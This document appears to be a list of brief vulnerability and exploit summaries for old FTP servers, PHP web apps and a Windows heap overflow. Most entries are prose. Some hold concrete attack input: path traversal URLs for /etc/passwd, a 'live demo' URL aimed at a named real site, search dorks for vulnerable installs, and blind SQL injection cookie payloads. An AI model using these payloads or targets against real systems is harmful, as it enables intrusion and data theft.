This exploit is used to remotely DoS a RaidenFTPD V2.4 build 3620 server. It sends an evil string to the server which corrupts the heap and causes the server to crash.
A vulnerability in XM Easy Personal FTP Server 5.6.0 allows remote attackers to cause a denial of service (daemon crash) via a long argument to the NLST command.
Depending the server configuration is possible that it doesn't allow us to scale directories. The PoC is /index.php?d=[DIR]&f=[FILE] and the exploit is /index.php?d=../../../../../../../../../../../etc/&f=passwd or /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd. A live demo is http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php and the dorks are "Powered by My PHP Indexer 1.0" and "priv8 :P".
True/false method to blind mysql injection. Examples: javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112" Response: You appears as logged in javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112" Response: You appears as not logged in javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112 Response: You appears as logged in if MySQL version is 4 javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112 Response: You appears as logged in if MySQL version is 5
GuildFTPd v0.999.8.11/v0.999.14 is vulnerable to a heap corruption vulnerability. An attacker can send a malicious CWD and LIST command to the server to cause a denial of service. The CWD command contains 124 '/.' characters and the LIST command contains 100 'X' characters. This exploit was published in 2008 by (x)dmnt.
A SQL injection vulnerability exists in Real-Estate-Scripts, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive information such as usernames, passwords, and other confidential data. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cat' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. The attacker can then use the retrieved information to gain access to the database and potentially gain access to sensitive information.
This exploit allows an attacker to rewrite or create any file on the vulnerable server. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mode' and 'data' parameters of the 'globsy_edit.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the vulnerable server. This will allow the attacker to rewrite or create any file on the vulnerable server.
The mini-pub 0.3 application is vulnerable to local file disclosure and command execution. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. For example, an attacker can send a request to the vulnerable application with a malicious file name parameter to disclose the content of the file. Similarly, an attacker can send a request with a malicious command to execute the command on the vulnerable application.
EMR_SETICMPROFILEA Heap Overflow DOS is a vulnerability related to MS08-046. It causes Windows Explorer and Internet Explorer to crash and allows running of arbitrary code. It has been tested on Windows XP Professional SP2 with mscms.dll 5.1.2600.2709 and gdi32.dll 5.1.2600.2818.
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'catid' in the 'index.php' script. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.
Services By CQR